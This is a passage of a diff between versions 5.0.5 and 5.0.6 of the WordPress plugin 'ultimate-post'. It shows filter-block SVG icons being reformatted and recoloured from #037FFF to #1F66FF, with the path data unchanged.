+        d="M16.7298 7.20003V8.46003C15.8098 6.79003 14.0298 5.66003 11.9998 5.66003C9.01984 5.66003 6.58984 8.09003 6.58984 11.07H8.08984C8.08984 8.91003 9.83984 7.16003 11.9998 7.16003C13.6898 7.16003 15.1198 8.24003 15.6598 9.74003H14.1898V11.24H18.2298V7.20003H16.7298Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/filter-icon.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/filter-icon.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/filter-icon.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/filter-icon.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,5 +1,11 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M11.7 3.75C11.39 2.18 10 1 8.34 1C6.68 1 5.29 2.18 4.98 3.75H1V5.13H4.97C5.28 6.7 6.67 7.88 8.33 7.88C9.99 7.88 11.38 6.7 11.69 5.13H22.99V3.75H11.69H11.7ZM8.33 6.5C7.19 6.5 6.27 5.57 6.27 4.44C6.27 3.31 7.2 2.38 8.33 2.38C9.46 2.38 10.39 3.31 10.39 4.44C10.39 5.57 9.46 6.5 8.33 6.5Z" fill="#037FFF"/>
-<path d="M19.03 11.3101C18.72 9.74006 17.33 8.56006 15.67 8.56006C14.01 8.56006 12.62 9.74006 12.31 11.3101H1V12.6901H12.3C12.61 14.2601 14 15.4401 15.66 15.4401C17.32 15.4401 18.71 14.2601 19.02 12.6901H22.99V11.3101H19.02H19.03ZM15.67 14.0601C14.53 14.0601 13.61 13.1301 13.61 12.0001C13.61 10.8701 14.54 9.94006 15.67 9.94006C16.8 9.94006 17.73 10.8701 17.73 12.0001C17.73 13.1301 16.8 14.0601 15.67 14.0601Z" fill="#037FFF"/>
-<path d="M11.7 18.88C11.39 17.31 10 16.13 8.34 16.13C6.68 16.13 5.29 17.31 4.98 18.88H1V20.26H4.97C5.28 21.83 6.67 23.01 8.33 23.01C9.99 23.01 11.38 21.83 11.69 20.26H22.99V18.88H11.69H11.7ZM8.33 21.62C7.19 21.62 6.27 20.69 6.27 19.56C6.27 18.43 7.2 17.5 8.33 17.5C9.46 17.5 10.39 18.43 10.39 19.56C10.39 20.69 9.46 21.62 8.33 21.62Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M11.7 3.75C11.39 2.18 10 1 8.34 1C6.68 1 5.29 2.18 4.98 3.75H1V5.13H4.97C5.28 6.7 6.67 7.88 8.33 7.88C9.99 7.88 11.38 6.7 11.69 5.13H22.99V3.75H11.69H11.7ZM8.33 6.5C7.19 6.5 6.27 5.57 6.27 4.44C6.27 3.31 7.2 2.38 8.33 2.38C9.46 2.38 10.39 3.31 10.39 4.44C10.39 5.57 9.46 6.5 8.33 6.5Z"
+        fill="#1F66FF" />
+    <path
+        d="M19.03 11.3101C18.72 9.74006 17.33 8.56006 15.67 8.56006C14.01 8.56006 12.62 9.74006 12.31 11.3101H1V12.6901H12.3C12.61 14.2601 14 15.4401 15.66 15.4401C17.32 15.4401 18.71 14.2601 19.02 12.6901H22.99V11.3101H19.02H19.03ZM15.67 14.0601C14.53 14.0601 13.61 13.1301 13.61 12.0001C13.61 10.8701 14.54 9.94006 15.67 9.94006C16.8 9.94006 17.73 10.8701 17.73 12.0001C17.73 13.1301 16.8 14.0601 15.67 14.0601Z"
+        fill="#1F66FF" />
+    <path
+        d="M11.7 18.88C11.39 17.31 10 16.13 8.34 16.13C6.68 16.13 5.29 17.31 4.98 18.88H1V20.26H4.97C5.28 21.83 6.67 23.01 8.33 23.01C9.99 23.01 11.38 21.83 11.69 20.26H22.99V18.88H11.69H11.7ZM8.33 21.62C7.19 21.62 6.27 20.69 6.27 19.56C6.27 18.43 7.2 17.5 8.33 17.5C9.46 17.5 10.39 18.43 10.39 19.56C10.39 20.69 9.46 21.62 8.33 21.62Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/order-by-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/order-by-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/order-by-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/order-by-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,9 +1,17 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z" fill="#037FFF"/>
-<path d="M7.31586 9.8733C6.41753 9.8733 5.69336 9.14913 5.69336 8.2508C5.69336 7.35246 6.41753 6.6283 7.31586 6.6283C8.21419 6.6283 8.93836 7.36163 8.93836 8.2508C8.93836 9.13996 8.20503 9.8733 7.31586 9.8733ZM7.31586 8.0033C7.17836 8.0033 7.06836 8.1133 7.06836 8.2508C7.06836 8.5258 7.57253 8.5258 7.57253 8.2508C7.57253 8.1133 7.46253 8.0033 7.32503 8.0033H7.31586Z" fill="#037FFF"/>
-<path d="M7.31586 13.6224C6.41753 13.6224 5.69336 12.8983 5.69336 11.9999C5.69336 11.1016 6.41753 10.3774 7.31586 10.3774C8.21419 10.3774 8.93836 11.1108 8.93836 11.9999C8.93836 12.8891 8.20503 13.6224 7.31586 13.6224ZM7.31586 11.7524C7.17836 11.7524 7.06836 11.8624 7.06836 11.9999C7.06836 12.2749 7.57253 12.2749 7.57253 11.9999C7.57253 11.8624 7.46253 11.7524 7.32503 11.7524H7.31586Z" fill="#037FFF"/>
-<path d="M7.31586 17.3717C6.41753 17.3717 5.69336 16.6475 5.69336 15.7492C5.69336 14.8509 6.41753 14.1267 7.31586 14.1267C8.21419 14.1267 8.93836 14.8509 8.93836 15.7492C8.93836 16.6475 8.20503 17.3717 7.31586 17.3717ZM7.31586 15.5017C7.17836 15.5017 7.06836 15.6117 7.06836 15.7492C7.06836 16.0242 7.57253 16.0242 7.57253 15.7492C7.57253 15.6117 7.46253 15.5017 7.32503 15.5017H7.31586Z" fill="#037FFF"/>
-<path d="M17.6189 7.56335H10.1206V8.93835H17.6189V7.56335Z" fill="#037FFF"/>
-<path d="M15.7489 11.3125H10.1206V12.6875H15.7489V11.3125Z" fill="#037FFF"/>
-<path d="M13.8698 15.0616H10.1206V16.4366H13.8698V15.0616Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z"
+        fill="#1F66FF" />
+    <path
+        d="M7.31586 9.8733C6.41753 9.8733 5.69336 9.14913 5.69336 8.2508C5.69336 7.35246 6.41753 6.6283 7.31586 6.6283C8.21419 6.6283 8.93836 7.36163 8.93836 8.2508C8.93836 9.13996 8.20503 9.8733 7.31586 9.8733ZM7.31586 8.0033C7.17836 8.0033 7.06836 8.1133 7.06836 8.2508C7.06836 8.5258 7.57253 8.5258 7.57253 8.2508C7.57253 8.1133 7.46253 8.0033 7.32503 8.0033H7.31586Z"
+        fill="#1F66FF" />
+    <path
+        d="M7.31586 13.6224C6.41753 13.6224 5.69336 12.8983 5.69336 11.9999C5.69336 11.1016 6.41753 10.3774 7.31586 10.3774C8.21419 10.3774 8.93836 11.1108 8.93836 11.9999C8.93836 12.8891 8.20503 13.6224 7.31586 13.6224ZM7.31586 11.7524C7.17836 11.7524 7.06836 11.8624 7.06836 11.9999C7.06836 12.2749 7.57253 12.2749 7.57253 11.9999C7.57253 11.8624 7.46253 11.7524 7.32503 11.7524H7.31586Z"
+        fill="#1F66FF" />
+    <path
+        d="M7.31586 17.3717C6.41753 17.3717 5.69336 16.6475 5.69336 15.7492C5.69336 14.8509 6.41753 14.1267 7.31586 14.1267C8.21419 14.1267 8.93836 14.8509 8.93836 15.7492C8.93836 16.6475 8.20503 17.3717 7.31586 17.3717ZM7.31586 15.5017C7.17836 15.5017 7.06836 15.6117 7.06836 15.7492C7.06836 16.0242 7.57253 16.0242 7.57253 15.7492C7.57253 15.6117 7.46253 15.5017 7.32503 15.5017H7.31586Z"
+        fill="#1F66FF" />
+    <path d="M17.6189 7.56335H10.1206V8.93835H17.6189V7.56335Z" fill="#1F66FF" />
+    <path d="M15.7489 11.3125H10.1206V12.6875H15.7489V11.3125Z" fill="#1F66FF" />
+    <path d="M13.8698 15.0616H10.1206V16.4366H13.8698V15.0616Z" fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/order-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/order-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/order-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/order-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,5 +1,11 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z" fill="#037FFF"/>
-<path d="M11.5141 13.3933L9.87324 15.025V7.3158H8.49824V15.025L6.85741 13.3933L5.88574 14.365L9.18574 17.6558L12.4857 14.365L11.5141 13.3933Z" fill="#037FFF"/>
-<path d="M18.1142 9.63495L14.8142 6.34412L11.5142 9.63495L12.4858 10.6066L14.1267 8.97495V16.6841H15.5017V8.97495L17.1425 10.6066L18.1142 9.63495Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z"
+        fill="#1F66FF" />
+    <path
+        d="M11.5141 13.3933L9.87324 15.025V7.3158H8.49824V15.025L6.85741 13.3933L5.88574 14.365L9.18574 17.6558L12.4857 14.365L11.5141 13.3933Z"
+        fill="#1F66FF" />
+    <path
+        d="M18.1142 9.63495L14.8142 6.34412L11.5142 9.63495L12.4858 10.6066L14.1267 8.97495V16.6841H15.5017V8.97495L17.1425 10.6066L18.1142 9.63495Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/post-block.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/post-block.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/post-block.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/post-block.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,7 +1,13 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z" fill="#037FFF"/>
-<path d="M15.9873 8.01251C15.9873 8.66334 15.4648 9.18584 14.814 9.18584C14.1631 9.18584 13.6406 8.66334 13.6406 8.01251C13.6406 7.36167 14.1631 6.83917 14.814 6.83917C15.4648 6.83917 15.9873 7.36167 15.9873 8.01251Z" fill="#037FFF"/>
-<path d="M18.0959 4.28168H5.90424C5.0059 4.28168 4.28174 5.00584 4.28174 5.90418V12.935C4.28174 13.8333 5.0059 14.5575 5.90424 14.5575H18.0959C18.9942 14.5575 19.7184 13.8242 19.7184 12.935V5.90418C19.7184 5.00584 18.9851 4.28168 18.0959 4.28168ZM5.65674 5.90418C5.65674 5.76668 5.76674 5.65668 5.90424 5.65668H18.0959C18.2334 5.65668 18.3434 5.76668 18.3434 5.90418V11.3492L17.0509 10.2583L15.0342 11.9633L10.9917 8.55334L5.6934 13.0267C5.6934 13.0267 5.65674 12.9717 5.65674 12.9442V5.91334V5.90418Z" fill="#037FFF"/>
-<path d="M19.4981 15.9966H4.50146V17.3716H19.4981V15.9966Z" fill="#037FFF"/>
-<path d="M15.749 18.3433H4.50146V19.7183H15.749V18.3433Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.4983 23H4.50167C2.5675 23 1 21.4325 1 19.4983V4.50167C1 2.5675 2.5675 1 4.50167 1H19.4983C21.4325 1 23 2.5675 23 4.50167V19.4983C23 21.4325 21.4325 23 19.4983 23ZM4.50167 2.375C3.32833 2.375 2.375 3.32833 2.375 4.50167V19.4983C2.375 20.6717 3.32833 21.625 4.50167 21.625H19.4983C20.6717 21.625 21.625 20.6717 21.625 19.4983V4.50167C21.625 3.32833 20.6717 2.375 19.4983 2.375H4.50167Z"
+        fill="#1F66FF" />
+    <path
+        d="M15.9873 8.01251C15.9873 8.66334 15.4648 9.18584 14.814 9.18584C14.1631 9.18584 13.6406 8.66334 13.6406 8.01251C13.6406 7.36167 14.1631 6.83917 14.814 6.83917C15.4648 6.83917 15.9873 7.36167 15.9873 8.01251Z"
+        fill="#1F66FF" />
+    <path
+        d="M18.0959 4.28168H5.90424C5.0059 4.28168 4.28174 5.00584 4.28174 5.90418V12.935C4.28174 13.8333 5.0059 14.5575 5.90424 14.5575H18.0959C18.9942 14.5575 19.7184 13.8242 19.7184 12.935V5.90418C19.7184 5.00584 18.9851 4.28168 18.0959 4.28168ZM5.65674 5.90418C5.65674 5.76668 5.76674 5.65668 5.90424 5.65668H18.0959C18.2334 5.65668 18.3434 5.76668 18.3434 5.90418V11.3492L17.0509 10.2583L15.0342 11.9633L10.9917 8.55334L5.6934 13.0267C5.6934 13.0267 5.65674 12.9717 5.65674 12.9442V5.91334V5.90418Z"
+        fill="#1F66FF" />
+    <path d="M19.4981 15.9966H4.50146V17.3716H19.4981V15.9966Z" fill="#1F66FF" />
+    <path d="M15.749 18.3433H4.50146V19.7183H15.749V18.3433Z" fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/search-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/search-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/search-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/search-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,4 +1,8 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.46 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23 2.59 23 4.55V19.46C23 21.42 21.41 23.01 19.46 23.01V23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.5 20.59 21.5 19.46V4.55C21.5 3.42 20.58 2.5 19.46 2.5H4.55Z" fill="#037FFF"/>
-<path d="M17.0602 18.12L14.5702 15.6C13.6402 16.32 12.4702 16.74 11.2002 16.74C8.14016 16.74 5.66016 14.25 5.66016 11.2C5.66016 8.15003 8.15016 5.66003 11.2002 5.66003C14.2502 5.66003 16.7402 8.15003 16.7402 11.2C16.7402 12.45 16.3202 13.61 15.6202 14.53L18.1202 17.06L17.0502 18.11L17.0602 18.12ZM11.2002 7.16003C8.97016 7.16003 7.16016 8.97003 7.16016 11.2C7.16016 13.43 8.97016 15.24 11.2002 15.24C13.4302 15.24 15.2402 13.43 15.2402 11.2C15.2402 8.97003 13.4302 7.16003 11.2002 7.16003Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.46 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23 2.59 23 4.55V19.46C23 21.42 21.41 23.01 19.46 23.01V23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.5 20.59 21.5 19.46V4.55C21.5 3.42 20.58 2.5 19.46 2.5H4.55Z"
+        fill="#1F66FF" />
+    <path
+        d="M17.0602 18.12L14.5702 15.6C13.6402 16.32 12.4702 16.74 11.2002 16.74C8.14016 16.74 5.66016 14.25 5.66016 11.2C5.66016 8.15003 8.15016 5.66003 11.2002 5.66003C14.2502 5.66003 16.7402 8.15003 16.7402 11.2C16.7402 12.45 16.3202 13.61 15.6202 14.53L18.1202 17.06L17.0502 18.11L17.0602 18.12ZM11.2002 7.16003C8.97016 7.16003 7.16016 8.97003 7.16016 11.2C7.16016 13.43 8.97016 15.24 11.2002 15.24C13.4302 15.24 15.2402 13.43 15.2402 11.2C15.2402 8.97003 13.4302 7.16003 11.2002 7.16003Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/tags-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/tags-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/tags-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/tags-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,5 +1,11 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.46 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23 2.59 23 4.55V19.46C23 21.42 21.41 23.01 19.46 23.01V23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.5 20.59 21.5 19.46V4.55C21.5 3.42 20.58 2.5 19.46 2.5H4.55Z" fill="#037FFF"/>
-<path d="M11.5301 18.42C11.1001 18.42 10.6701 18.26 10.3401 17.93L6.07008 13.66C5.75008 13.34 5.58008 12.92 5.58008 12.47C5.58008 12.02 5.76008 11.6 6.07008 11.28L10.7301 6.62C11.0401 6.31 11.4801 6.13 11.9201 6.13H16.1901C17.1201 6.13 17.8701 6.88 17.8701 7.81V12.08C17.8701 12.53 17.7001 12.95 17.3801 13.27L12.7201 17.93C12.3901 18.26 11.9601 18.42 11.5301 18.42ZM11.9201 7.62C11.9201 7.62 11.8301 7.64 11.7901 7.67L7.13008 12.33C7.07008 12.39 7.07008 12.53 7.13008 12.59L11.4001 16.86C11.4701 16.93 11.5901 16.93 11.6601 16.86L16.3201 12.2C16.3201 12.2 16.3701 12.12 16.3701 12.07V7.8C16.3701 7.7 16.2901 7.62 16.1901 7.62H11.9201Z" fill="#037FFF"/>
-<path d="M15.0899 9.87003C15.0899 10.4 14.6599 10.83 14.1299 10.83C13.5999 10.83 13.1699 10.4 13.1699 9.87003C13.1699 9.34003 13.5999 8.91003 14.1299 8.91003C14.6599 8.91003 15.0899 9.34003 15.0899 9.87003Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.46 23H4.55C2.59 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.55 1H19.46C21.42 1 23 2.59 23 4.55V19.46C23 21.42 21.41 23.01 19.46 23.01V23ZM4.55 2.5C3.42 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.55 21.51H19.46C20.59 21.51 21.5 20.59 21.5 19.46V4.55C21.5 3.42 20.58 2.5 19.46 2.5H4.55Z"
+        fill="#1F66FF" />
+    <path
+        d="M11.5301 18.42C11.1001 18.42 10.6701 18.26 10.3401 17.93L6.07008 13.66C5.75008 13.34 5.58008 12.92 5.58008 12.47C5.58008 12.02 5.76008 11.6 6.07008 11.28L10.7301 6.62C11.0401 6.31 11.4801 6.13 11.9201 6.13H16.1901C17.1201 6.13 17.8701 6.88 17.8701 7.81V12.08C17.8701 12.53 17.7001 12.95 17.3801 13.27L12.7201 17.93C12.3901 18.26 11.9601 18.42 11.5301 18.42ZM11.9201 7.62C11.9201 7.62 11.8301 7.64 11.7901 7.67L7.13008 12.33C7.07008 12.39 7.07008 12.53 7.13008 12.59L11.4001 16.86C11.4701 16.93 11.5901 16.93 11.6601 16.86L16.3201 12.2C16.3201 12.2 16.3701 12.12 16.3701 12.07V7.8C16.3701 7.7 16.2901 7.62 16.1901 7.62H11.9201Z"
+        fill="#1F66FF" />
+    <path
+        d="M15.0899 9.87003C15.0899 10.4 14.6599 10.83 14.1299 10.83C13.5999 10.83 13.1699 10.4 13.1699 9.87003C13.1699 9.34003 13.5999 8.91003 14.1299 8.91003C14.6599 8.91003 15.0899 9.34003 15.0899 9.87003Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/taxonomy-sort-filter.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/taxonomy-sort-filter.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/adv-filter/taxonomy-sort-filter.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/adv-filter/taxonomy-sort-filter.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1,4 +1,8 @@
 <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
-<path d="M19.45 23H4.54C2.58 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.54 1H19.45C21.41 1 23 2.59 23 4.55V19.46C23 21.42 21.41 23.01 19.45 23.01V23ZM4.54 2.5C3.41 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.54 21.51H19.45C20.58 21.51 21.5 20.59 21.5 19.46V4.55C21.5 3.42 20.58 2.5 19.45 2.5H4.54Z" fill="#037FFF"/>
-<path d="M15.2598 14.05C14.3398 14.05 13.5598 14.63 13.2498 15.45H9.47982V12.29H13.2498C13.5598 13.1 14.3398 13.69 15.2498 13.69C16.4298 13.69 17.3998 12.73 17.3998 11.54C17.3998 10.35 16.4398 9.39003 15.2498 9.39003C14.3298 9.39003 13.5498 9.97003 13.2398 10.79H9.46982V9.82003C10.2798 9.51003 10.8698 8.73003 10.8698 7.81003C10.8698 6.63003 9.90982 5.66003 8.71982 5.66003C7.52982 5.66003 6.56982 6.62003 6.56982 7.81003C6.56982 8.73003 7.14982 9.51003 7.96982 9.82003V16.95H13.2398C13.5498 17.76 14.3298 18.35 15.2498 18.35C16.4298 18.35 17.3998 17.39 17.3998 16.2C17.3998 15.01 16.4398 14.05 15.2498 14.05H15.2598ZM15.2598 10.89C15.6198 10.89 15.9098 11.18 15.9098 11.54C15.9098 11.9 15.6198 12.19 15.2598 12.19C14.8998 12.19 14.6098 11.9 14.6098 11.54C14.6098 11.18 14.8998 10.89 15.2598 10.89ZM8.73982 7.16003C9.09982 7.16003 9.38982 7.45003 9.38982 7.81003C9.38982 8.17003 9.09982 8.46003 8.73982 8.46003C8.37982 8.46003 8.08982 8.17003 8.08982 7.81003C8.08982 7.45003 8.37982 7.16003 8.73982 7.16003ZM15.2598 16.84C14.8998 16.84 14.6098 16.55 14.6098 16.19C14.6098 15.83 14.8998 15.54 15.2598 15.54C15.6198 15.54 15.9098 15.83 15.9098 16.19C15.9098 16.55 15.6198 16.84 15.2598 16.84Z" fill="#037FFF"/>
-</svg>
+    <path
+        d="M19.45 23H4.54C2.58 23 1 21.41 1 19.45V4.55C1 2.59 2.59 1 4.54 1H19.45C21.41 1 23 2.59 23 4.55V19.46C23 21.42 21.41 23.01 19.45 23.01V23ZM4.54 2.5C3.41 2.5 2.5 3.42 2.5 4.55V19.46C2.5 20.59 3.42 21.51 4.54 21.51H19.45C20.58 21.51 21.5 20.59 21.5 19.46V4.55C21.5 3.42 20.58 2.5 19.45 2.5H4.54Z"
+        fill="#1F66FF" />
+    <path
+        d="M15.2598 14.05C14.3398 14.05 13.5598 14.63 13.2498 15.45H9.47982V12.29H13.2498C13.5598 13.1 14.3398 13.69 15.2498 13.69C16.4298 13.69 17.3998 12.73 17.3998 11.54C17.3998 10.35 16.4398 9.39003 15.2498 9.39003C14.3298 9.39003 13.5498 9.97003 13.2398 10.79H9.46982V9.82003C10.2798 9.51003 10.8698 8.73003 10.8698 7.81003C10.8698 6.63003 9.90982 5.66003 8.71982 5.66003C7.52982 5.66003 6.56982 6.62003 6.56982 7.81003C6.56982 8.73003 7.14982 9.51003 7.96982 9.82003V16.95H13.2398C13.5498 17.76 14.3298 18.35 15.2498 18.35C16.4298 18.35 17.3998 17.39 17.3998 16.2C17.3998 15.01 16.4398 14.05 15.2498 14.05H15.2598ZM15.2598 10.89C15.6198 10.89 15.9098 11.18 15.9098 11.54C15.9098 11.9 15.6198 12.19 15.2598 12.19C14.8998 12.19 14.6098 11.9 14.6098 11.54C14.6098 11.18 14.8998 10.89 15.2598 10.89ZM8.73982 7.16003C9.09982 7.16003 9.38982 7.45003 9.38982 7.81003C9.38982 8.17003 9.09982 8.46003 8.73982 8.46003C8.37982 8.46003 8.08982 8.17003 8.08982 7.81003C8.08982 7.45003 8.37982 7.16003 8.73982 7.16003ZM15.2598 16.84C14.8998 16.84 14.6098 16.55 14.6098 16.19C14.6098 15.83 14.8998 15.54 15.2598 15.54C15.6198 15.54 15.9098 15.83 15.9098 16.19C15.9098 16.55 15.6198 16.84 15.2598 16.84Z"
+        fill="#1F66FF" />
+</svg>
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/builder/related_post.svg /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/builder/related_post.svg
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/img/blocks/builder/related_post.svg	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/img/blocks/builder/related_post.svg	2026-02-02 04:04:06.000000000 +0000
@@ -1 +1,2 @@
